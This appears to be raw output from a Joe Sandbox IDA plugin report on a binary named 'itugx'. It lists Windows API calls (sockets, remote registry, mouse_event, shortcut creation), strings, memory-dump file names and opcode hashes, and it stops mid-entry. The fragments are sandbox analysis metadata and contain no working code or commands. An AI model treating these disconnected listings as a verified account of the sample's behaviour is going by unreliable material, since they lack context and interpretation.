                                                    • API String ID: 1025951953-3636473452
                                                    • Opcode ID: efeb2c66b7075bc57ea89602048da6f2874b4b6b4c0421ae2694316bb87e3a26
                                                    • Instruction ID: 4bbf1eea12ca26172869154053a6cd9292099bc01c320ec2df53042a3a7115bf
                                                    • Opcode Fuzzy Hash: efeb2c66b7075bc57ea89602048da6f2874b4b6b4c0421ae2694316bb87e3a26
                                                    • Instruction Fuzzy Hash: FA11C4B215021DBEEF129F64CC81EE77FADEF09758F018111FB18A6090CA729C21DBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0037E23D
                                                    • LoadStringW.USER32(00000000), ref: 0037E244
                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0037E25A
                                                    • LoadStringW.USER32(00000000), ref: 0037E261
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0037E2A5
                                                    Strings
                                                    • %s (%d) : ==> %s: %s %s, xrefs: 0037E282
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString$Message
                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                    • API String ID: 4072794657-3128320259
                                                    • Opcode ID: 6310e384de899ab89e208a4f6e1d6aad116b3a1e7ce4428720163a5d8ffba508
                                                    • Instruction ID: 460561f3363ecf392f58656a8d00fa918825ed76c39837a859bf9c2bb7eceb59
                                                    • Opcode Fuzzy Hash: 6310e384de899ab89e208a4f6e1d6aad116b3a1e7ce4428720163a5d8ffba508
                                                    • Instruction Fuzzy Hash: 040181F6900208BFE752ABA4DD89EEB776CDB08300F408591F74AE6451EA749E848B70
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0039271D
                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0039273E
                                                    • WSAGetLastError.WSOCK32 ref: 0039274F
                                                    • htons.WSOCK32(?,?,?,?,?), ref: 00392838
                                                    • inet_ntoa.WSOCK32(?), ref: 003927E9
                                                      • Part of subcall function 00374277: _strlen.LIBCMT ref: 00374281
                                                      • Part of subcall function 00393B81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0038F569), ref: 00393B9D
                                                    • _strlen.LIBCMT ref: 00392892
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                    • String ID:
                                                    • API String ID: 3203458085-0
                                                    • Opcode ID: 6efeaaa72bf42ad1f60217e1b4a027d4e353085f8f9a5e093319e702cf136c74
                                                    • Instruction ID: cfd5b97530226410515f2017c7d12f90d995e9418c7ae4901e74618b3d5c1ff9
                                                    • Opcode Fuzzy Hash: 6efeaaa72bf42ad1f60217e1b4a027d4e353085f8f9a5e093319e702cf136c74
                                                    • Instruction Fuzzy Hash: 52B10235204700AFC726DF24C895E6B7BE9AF88318F55854CF4965F2A2CB31ED82CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • __allrem.LIBCMT ref: 0034044A
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00340466
                                                    • __allrem.LIBCMT ref: 0034047D
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0034049B
                                                    • __allrem.LIBCMT ref: 003404B2
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003404D0
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                    • String ID:
                                                    • API String ID: 1992179935-0
                                                    • Opcode ID: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                                                    • Instruction ID: 91f190a0612299dde40e344fd4c95cc7a9b149628b926c3a53b93bc40a2be026
                                                    • Opcode Fuzzy Hash: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                                                    • Instruction Fuzzy Hash: 2B81E8767007059BD72AAE79CC81B6BB7E8AF41324F25452AF711DE791E770F9008B50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00338669,00338669,?,?,?,003467DF,00000001,00000001,8BE85006), ref: 003465E8
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,003467DF,00000001,00000001,8BE85006,?,?,?), ref: 0034666E
                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00346768
                                                    • __freea.LIBCMT ref: 00346775
                                                      • Part of subcall function 00343BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00336A99,?,0000015D,?,?,?,?,003385D0,000000FF,00000000,?,?), ref: 00343BE2
                                                    • __freea.LIBCMT ref: 0034677E
                                                    • __freea.LIBCMT ref: 003467A3
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1414292761-0
                                                    • Opcode ID: dc2189050cbdb5aa5bce2e60524992683d487d756271abd56fbde5c7ff782739
                                                    • Instruction ID: 7f634d9af07dfb3fb510e27c1566172773c84db0cf47c6dead0af52add96be85
                                                    • Opcode Fuzzy Hash: dc2189050cbdb5aa5bce2e60524992683d487d756271abd56fbde5c7ff782739
                                                    • Instruction Fuzzy Hash: BC51D172600216ABDB268F64CC82EAB7BE9EB42754F164629FC15DE150EB34FC44C691
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0031B25F: _wcslen.LIBCMT ref: 0031B269
                                                      • Part of subcall function 0039D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0039C00D,?,?), ref: 0039D314
                                                      • Part of subcall function 0039D2F7: _wcslen.LIBCMT ref: 0039D350
                                                      • Part of subcall function 0039D2F7: _wcslen.LIBCMT ref: 0039D3C7
                                                      • Part of subcall function 0039D2F7: _wcslen.LIBCMT ref: 0039D3FD
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0039C629
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0039C684
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0039C6C9
                                                    • RegEnumValueW.ADVAPI32 ref: 0039C6F8
                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0039C752
                                                    • RegCloseKey.ADVAPI32(?), ref: 0039C75E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                    • String ID:
                                                    • API String ID: 1120388591-0
                                                    • Opcode ID: dfa64c90e113fb36157deeb4c08f9def73f69fd69f3d339172223d1a78eb88d3
                                                    • Instruction ID: 581656e860d44dacc6b5ecbd50e1b17282edffafeba34f3c1aef970d78bb1164
                                                    • Opcode Fuzzy Hash: dfa64c90e113fb36157deeb4c08f9def73f69fd69f3d339172223d1a78eb88d3
                                                    • Instruction Fuzzy Hash: 8F81A131118241AFD716DF24C885E6ABBE5FF84308F14555CF4854B2A2DB31ED45CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VariantInit.OLEAUT32(00000035), ref: 00370049
                                                    • SysAllocString.OLEAUT32(00000000), ref: 003700F0
                                                    • VariantCopy.OLEAUT32(003702F4,00000000), ref: 00370119
                                                    • VariantClear.OLEAUT32(003702F4), ref: 0037013D
                                                    • VariantCopy.OLEAUT32(003702F4,00000000), ref: 00370141
                                                    • VariantClear.OLEAUT32(?), ref: 0037014B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearCopy$AllocInitString
                                                    • String ID:
                                                    • API String ID: 3859894641-0
                                                    • Opcode ID: 89138f8c4ced92b34262beaea1ebbb90054f0885f7ee6a3650af4af9f1fe08c3
                                                    • Instruction ID: 3f6d276f5de8bf1b7c933fe4e19ec1ef101279bda6cf2d2576347ed7b82fc684
                                                    • Opcode Fuzzy Hash: 89138f8c4ced92b34262beaea1ebbb90054f0885f7ee6a3650af4af9f1fe08c3
                                                    • Instruction Fuzzy Hash: 94510835640310EACF3AAB74D895B29B3A8EF0A310F14D447E90ADF296DB789C40CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00386E36
                                                    • CoInitialize.OLE32(00000000), ref: 00386F93
                                                    • CoCreateInstance.OLE32(003B0CC4,00000000,00000001,003B0B34,?), ref: 00386FAA
                                                    • CoUninitialize.OLE32 ref: 0038722E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                    • String ID: .lnk
                                                    • API String ID: 886957087-24824748
                                                    • Opcode ID: c223cdb48496736e0f5d8c70bd34853ca1c580e9b567208dc22ce3efdb1e9852
                                                    • Instruction ID: c6d55a6888e291d802cf265057faf1db910ec0ad6a953da5399b2fe2d5ab8f83
                                                    • Opcode Fuzzy Hash: c223cdb48496736e0f5d8c70bd34853ca1c580e9b567208dc22ce3efdb1e9852
                                                    • Instruction Fuzzy Hash: 71D14771608301AFC30AEF24C881DABB7E8EF98704F54495DF5958B2A1DB71ED45CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0036FB8F,00000000,?,?,00000000,?,003539BC,00000004,00000000,00000000), ref: 003A8BAB
                                                    • EnableWindow.USER32(?,00000000), ref: 003A8BD1
                                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 003A8C30
                                                    • ShowWindow.USER32(?,00000004), ref: 003A8C44
                                                    • EnableWindow.USER32(?,00000001), ref: 003A8C6A
                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 003A8C8E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Window$Show$Enable$MessageSend
                                                    • String ID:
                                                    • API String ID: 642888154-0
                                                    • Opcode ID: 35bc5dc2da56fc3434c6ed70476980ecf6354a9893e1d8f58c77fc047b3f01d7
                                                    • Instruction ID: 0b9d6260abfae43cc2fc4fd30f915b1e8a34a365936bfbb92969e459d3450f94
                                                    • Opcode Fuzzy Hash: 35bc5dc2da56fc3434c6ed70476980ecf6354a9893e1d8f58c77fc047b3f01d7
                                                    • Instruction Fuzzy Hash: FB417374601244AFDB2BCF24D889FA57BE4FB4B314F195269E5094F2A2CB31A851CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 00392C45
                                                      • Part of subcall function 0038EE49: GetWindowRect.USER32 ref: 0038EE61
                                                    • GetDesktopWindow.USER32 ref: 00392C6F
                                                    • GetWindowRect.USER32 ref: 00392C76
                                                    • mouse_event.USER32 ref: 00392CB2
                                                    • GetCursorPos.USER32(?,?,?,?,?,00000000), ref: 00392CDE
                                                    • mouse_event.USER32 ref: 00392D3C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                    • String ID:
                                                    • API String ID: 2387181109-0
                                                    • Opcode ID: 2766d9940050162c2c1be08e67cc7f06efce9ddaab110cf6fd6f2822025614bb
                                                    • Instruction ID: 6521d74f690cdfc56a1e07ba83c18d1f558fca663cfa911c1808776792e148f4
                                                    • Opcode Fuzzy Hash: 2766d9940050162c2c1be08e67cc7f06efce9ddaab110cf6fd6f2822025614bb
                                                    • Instruction Fuzzy Hash: 8531DE72505715AFDB22DF14D849B9FB7A9FF85354F00091AF889A7291DB30EA08CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0031557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00315558,?,?,00354B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0031559E
                                                    • _wcslen.LIBCMT ref: 003861D5
                                                    • CoInitialize.OLE32(00000000), ref: 003862EF
                                                    • CoCreateInstance.OLE32(003B0CC4,00000000,00000001,003B0B34,?), ref: 00386308
                                                    • CoUninitialize.OLE32 ref: 00386326
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                    • String ID: .lnk
                                                    • API String ID: 3172280962-24824748
                                                    • Opcode ID: f909175e39cf6fa9d03d2ab40d89be5196813eb11eee0bcf10e52618faa9322d
                                                    • Instruction ID: 78dff585f99c5f0e0b5c22f6c2ff87f1dfad26bf48aaf9722cc34f696cdcd223
                                                    • Opcode Fuzzy Hash: f909175e39cf6fa9d03d2ab40d89be5196813eb11eee0bcf10e52618faa9322d
                                                    • Instruction Fuzzy Hash: 1BD152756043109FC71AEF24C481A6ABBE6FF89714F15889DF8869B361CB31EC45CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0037210F
                                                    • UnloadUserProfile.USERENV(?,?), ref: 0037211B
                                                    • CloseHandle.KERNEL32(?), ref: 00372124
                                                    • CloseHandle.KERNEL32(?), ref: 0037212C
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00372135
                                                    • HeapFree.KERNEL32(00000000), ref: 0037213C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                     • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                    • String ID:
                                                    • API String ID: 146765662-0
                                                    • Opcode ID: c1355b318b7b54a862386cb721d90c9995cf60ccf23551bc6db1be18dc207bcc
                                                    • Instruction ID: 10d49a955ba826bd10d2f568b8b58c3416a14d2f6c9e5e97bd7474ec86b8bbaf
                                                    • Opcode Fuzzy Hash: c1355b318b7b54a862386cb721d90c9995cf60ccf23551bc6db1be18dc207bcc
                                                    • Instruction Fuzzy Hash: C9E0E576104101BBDB421FA1ED0C94ABF3DFF4A322F104220F226828B0DB369421DF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00314154: _wcslen.LIBCMT ref: 00314159
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0037CEAE
                                                    • _wcslen.LIBCMT ref: 0037CEF5
                                                    • SetMenuItemInfoW.USER32 ref: 0037CF5C
                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0037CF8A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                     • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info_wcslen$Default
                                                    • String ID: 0
                                                    • API String ID: 1227352736-4108050209
                                                    • Opcode ID: 00fe50738247e42db2b56c12866374b3382c0960bd32830d0c9f28ac071cad9b
                                                    • Instruction ID: 68021a22ef6f3d9a6e91e790fe8a37d4ca34842268ccd07c5027087b987c75ff
                                                    • Opcode Fuzzy Hash: 00fe50738247e42db2b56c12866374b3382c0960bd32830d0c9f28ac071cad9b
                                                    • Instruction Fuzzy Hash: EE51E0716243009BD737DF28C884BABB7E9AF89310F059A2DF899D62D0DB68CD44C752
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003A4794
                                                    • IsMenu.USER32 ref: 003A47A9
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003A47F1
                                                    • DrawMenuBar.USER32 ref: 003A4804
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                     • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$DrawInfoInsert
                                                    • String ID: 0
                                                    • API String ID: 3076010158-4108050209
                                                    • Opcode ID: fc610e1f6ac26ec93cb2b53891c230df55ea2799a2157f88b0a3f37c5f394001
                                                    • Instruction ID: 20c6c83c9122fdd65f56db58588156871c4785c2d44eb2b189a2349fb907092e
                                                    • Opcode Fuzzy Hash: fc610e1f6ac26ec93cb2b53891c230df55ea2799a2157f88b0a3f37c5f394001
                                                    • Instruction Fuzzy Hash: 31415B75A01249EFDB22CF54E884EAABBB8FF8A314F054129F9159B250C7B5ED50CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0031B25F: _wcslen.LIBCMT ref: 0031B269
                                                      • Part of subcall function 00374536: GetClassNameW.USER32 ref: 00374559
                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 003726F6
                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00372709
                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00372739
                                                      • Part of subcall function 003184B7: _wcslen.LIBCMT ref: 003184CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                     • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$_wcslen$ClassName
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 2081771294-1403004172
                                                    • Opcode ID: a228a8959d746519baca9950c6c163d4472df73fb9f6ed5b7f4546c5e67de5bf
                                                    • Instruction ID: 3b13049f8d50d723793dd9a491bd85514216792f8570e71b47fcc13201e225aa
                                                    • Opcode Fuzzy Hash: a228a8959d746519baca9950c6c163d4472df73fb9f6ed5b7f4546c5e67de5bf
                                                    • Instruction Fuzzy Hash: 6B212671900104BFDB2EABA4D886DFFB778DF4A360F148119F466AB1E1DB3C494A8610
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryA.KERNEL32 ref: 0036E72B
                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0036E73D
                                                    • FreeLibrary.KERNEL32(00000000), ref: 0036E763
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                     • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                     • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressFreeLoadProc
                                                    • String ID: GetSystemWow64DirectoryW$X64
                                                    • API String ID: 145871493-2590602151
                                                    • Opcode ID: 71a7ba7ca447ba07c595a1942ff522503052d7f386c8f95d4f1f936055fd9977
                                                    • Instruction ID: 5bb44528d0503337e395aef973fdd3a9c51c4613aa16c121f155c907b1172cc4
